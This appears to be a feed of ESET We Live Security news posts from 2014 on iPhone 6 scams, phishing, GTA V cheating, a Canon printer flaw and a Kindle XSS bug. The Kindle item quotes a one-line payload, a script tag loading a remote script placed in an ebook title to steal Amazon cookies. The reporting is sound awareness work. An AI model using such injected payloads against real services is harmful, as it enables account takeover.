ESET
This week offered a lesson in how cybercriminals follow the news, and time their attacks to dupe the unwary – with several different attacks aimed at iPhone fans, in the week where Apple unveiled its iPhone 6.
The post Week in security: Free iPhone scams target eager fans appeared first on We Live Security.
This Thursday, September 18, is the biggest day in Scottish political history, as the country votes on whether it should become independent from the United Kingdom – but an ESET security expert has warned cybercriminals could strike.
The post Scottish independence poll – warning over phishing scams appeared first on We Live Security.
The dangers of clicking on links in eBay scam postings were highlighted after a fake posting advertising iPhones linked to a phishing site designed to steal usernames and passwords for the site.
The post eBay scam: site ‘slow to react’ after iPhone phishing attack appeared first on We Live Security.
With iOS 8, you can – for the first time – switch your Safari browser’s search engine to alternatives such as DuckDuckGo. Find out why you might want to and, in fairness, why you might NOT want to…
The post How to change Safari’s default search engine in iOS 8 for greater privacy appeared first on We Live Security.
Now more than ever, its important to make sure your social media accounts are safe and secure. Here are our 6 top tips to make your social media accounts almost unhackable.
The post How to make your social media accounts (almost) unhackable appeared first on We Live Security.
Facebook scams tend to crop up in the run-up to a big Apple launch with around the same regularity as big Apple launches themselves. This week’s iPhone 6 launch is no exception, with Help Net Security noting that a Facebook page ‘offering’ free iPhone 6 units is, as usual, a total fraud.
This time, the scam promises a free iPhone 6 as soon as “three easy steps†are completed, which, as usual, involve a survey, which allows you to download a “participation application.â€
When a victim completes the free iPhone 6 survey, all their friends are spammed with the fake promotion, Hoax Slayer reveals, but the three “easy†steps are anything but.
Each time someone completes a survey, the page claims there is an error, and they are directed to a further survey, according to Help Net. As always, the “free iPhone 6†never materializes.
“Some of the available surveys want you to provide your mobile phone number, ostensibly to go in the draw for extra prizes or offers. But, by submitting your number, you will actually be subscribing to a very expensive text messaging ‘service’ that will charge you several dollars every time they send you a message,†Hoax Slayer says.
“Alternatively, you may be asked to provide your name, address, and phone details, again, to supposedly enter you into a prize draw. But, fine print on the page will state that your details will be shared with third-party marketers. Thus, after submitting your details, you will likely be inundated with annoying phone calls, emails, and junk mail.â€
“Meanwhile, the scammer who created the fake promotion will earn a commission. But, no matter how many surveys you complete, you will still not get to download your ‘application’.â€
The site cautions against clicking on any link this week which offers a free iPhone 6, as this sort of big product launch is a prime target for cybercriminals, and any link is potentially suspect.
Mark James, ESET security specialist, says, “We all like the idea of something for free, that’s the approach these type of scams use. Deep down we know it’s not going to happen, but a lot of people will still click the like button or share that simple post in the hope it’s going to arrive.â€
“We have seen these types of scams for years but they are still as effective today as they were when started, once we like or share the page we do all the marketing and advertising for the scammers thus providing a very valuable and potential dangerous page to initiate future scams or attacks.â€
“I still encourage people to use the “front door†policy, i.e treat it like your front door: ‘When was the last time someone banged on your front door to offer you an iPhone 5 or 6 just for filling out a survey or a £10/£50 supermarket voucher for free?’ It just does not happen.â€
The post Free iPhone 6 Facebook scam does the rounds, right on time appeared first on We Live Security.
Gamers have reported losing millions of dollars to hackers running customized software which allows them to steal weapons, loot money, and even make people blow up in their own apartments, according to prominent Grand Theft Auto V YouTube reporter DomIsLive, who devoted an issue of his daily show to GTA V hacks this month.
Yahoo News reports that multiple players have been affected by glitches in online games, described variously as “unfairly moddedâ€, ie using in-game tools, or simply as “hackedâ€.
DomIsLive, who has nearly half a million subscribers on YouTube, says that several of his subscribers reported losing “millions†in online games which had seemingly been hacked.
On Rockstar’s forums, various gamers complain about having lost large sums of in-game currency to similar GTA V hacks. DomIsLive claims to have seen multiple threads on the forums relating to the same or similar hacks.
ESET Distinguished Researcher Aryeh Goretsky looks in detail at the blurred lines between cheating and crime in an extended blog post on We Live Security, saying, “Computer gaming is a huge and a wildly successful market, and as in any system that works at scale, there are going to be so-called businessmen or entrepreneurs who “seek to optimize their return on investment through whatever means possible†or, to put it more succinctly, criminals who abuse the ecosystem.â€
It appears GTA V’s online game system is not exempt.
In one screenshot posted on DomisLive’s channel, a gamer complains, “Dear Rockstar, I have just been robbed of my weapons by an unfair modder. He stole my weapons, causing me to pay around 1,000,000 and I earned it fair and square, and I wondered if I could get my money back because I’m extremely frustrated.â€
A Rockstar games representative replies, saying that the team will investigate, but warning that, “Rockstar will definitely look into this, however they may not be able to reimburse you with weapons and/or GTA dollars.â€
It’s unclear whether one specific GTA V hack is responsible, or a multitude of methods. DomisLive advises his subscribers, “Losing their money in public sessions, I advise you to stay out of public sessions and stick to private sessions with this friend. If you see something strange happening, and if you see someone dropping their money, leave that lobby now.â€
Responses from his subscribers seem to indicate that the problem is worse on Xbox 360 than on PlayStation 3. One poster says, “On Xbox it seems like every 20 sessions you join, you find one [a hacker]. On the PS3 I haven’t found that many, and from what people have told me, it’s because there aren’t that many.â€
The post GTA V hacks warning as gamers ‘lose millions’ in online games appeared first on We Live Security.
Business continuity is a term that can sound strange the first time you hear it; after all, you probably have every intention of being in business for the long haul. Right now you may be preparing the 2015 sales forecast and budget, with hopes for a great year ahead. But in your planning, have you thought about how your business would handle the bad things that can happen, from a computer virus outbreak to a biological virus outbreak, and all the other perils in-between, like fires, floods, tornadoes, hurricanes, earthquakes, and tsunamis?
Putting a plan in place to survive such “adverse events” is the goal of business continuity management or BCM, and it could well be the key to securing your digital future. Here is a 50 minute webinar that I recorded on this topic earlier this year. If you want to get a handle on planning for the future of your business, take a listen:
The post Is your business prepared to continue? Watch now and get started with BCM appeared first on We Live Security.
Printer giant Canon is to provide a security fix “as quickly as is feasible†after a researcher exploited vulnerabilities in one of its wireless PIXMA products to run the classic shoot ‘em up game Doom on its colour display.
Security researcher Michael Jordon told the BBC in an interview, “Running Doom: that’s real proof you control the thing. The web interface has no username and password on it.â€
Digital Trends said that the vulnerability, which allows access to printer controls via an unsecured web page, highlighted the problems not just of printer security, but that of the entire emerging “internet of things.â€
Canon said that all new products would have a fix added as soon as possible, and that the fix would retroactively apply to products launched from 2013 onwards.
“At Canon we work hard at securing all of our products, however with diverse and ever-changing security threats we welcome input from others to ensure our customers are as well protected as possible,†the firm said.
A search using Shodan (a specialist search engine which finds specific types of devices connected to the internet), revealed thousands of unsecured machines connected directly to the internet.
“This interface does not require user authentication allowing anyone to connect to the interface.  At first glance the functionality seems to be relatively benign, you could print out hundreds of test pages and use up all the ink and paper, so what?†Jordon writes.
He said that the problems (and the opportunity to run Doom) arose when you use the online interface to update the firmware, and raised serious printer security issues.
Persuading the printer to run Doom took “monthsâ€, he admits, but the issue is a serious one. Even printers not directly connected to the internet can fall victim, he said, by persuading their owners to click on a bogus link.
Jordon writes, “Even if the printer is not directly accessible from the Internet, for example behind a NAT on a user’s home network or on an office intranet, the printer is still vulnerable to remote attack.â€
“A colleague (thanks Paul Stone) demonstrated this by making a web page that first scans the local network for vulnerable printers (using a technique called JavaScript port scanning). Once the printer’s IP address has been found, the web page sends a request to the web interface to modify the proxy configuration and trigger a firmware update.â€
The post Printer security: Canon offers ‘fix’ after researcher plays Doom appeared first on We Live Security.
Pirating ebooks is not just bad for the publishing industry: free ebooks available online can also be used to hack into Amazon accounts via the retail giant’s ‘Manage Your Kindle’ page, used to deliver ebook files to Kindle Readers, according to researcher Benjamin Daniel Mussler.
Mussler writes that simply changing the title of the free ebooks allows attackers to execute code when a victim opens the ‘Kindle Library’ page in a web browser, The Digital Reader reports
“As a result, Amazon account cookies can be accessed by and transferred to the attacker and the victim’s Amazon account can be compromised,†Mussler writes.
Engadget reports that Mussler discovered the security issue last October, and the company rapidly patched it. It was reintroduced, however, when the company launched a new version of the “Manage Your Kindle†web page.
Mussler writes that the threat affects, “Everyone who uses Amazon’s Kindle Library,†but stresses that the flaw affects those who pirate free ebooks in particular.
The attack takes place, he writes, “Once an attacker manages to have an e-book (file, document, …) with a title like <script src=”https://www.example.org/script.js”></script> added to the victim’s library.â€
Mussler says, “Users most likely to fall victim to this vulnerability are those who obtain e-books from untrustworthy sources (read: pirated e-books) and then use Amazon’s “Send to Kindle” service to have them delivered to their Kindle. From the supplier’s point of view, vulnerabilities like this present an opportunity to gain access to active Amazon accounts.â€
The reappearance of the flaw was highlighted by the German ebook blog Alles Book. The site also produced a proof-of-concept ebook download to demonstrate that it worked. As of the time of writing, the flaw is still active, Mussler reports.
Mussler says, “Amazon chose not to respond to my subsequent email detailing the issue, and two months later, the vulnerability remains unfixed.â€
The post Free ebooks warning: Pirates ‘can hack into Amazon accounts’ appeared first on We Live Security.
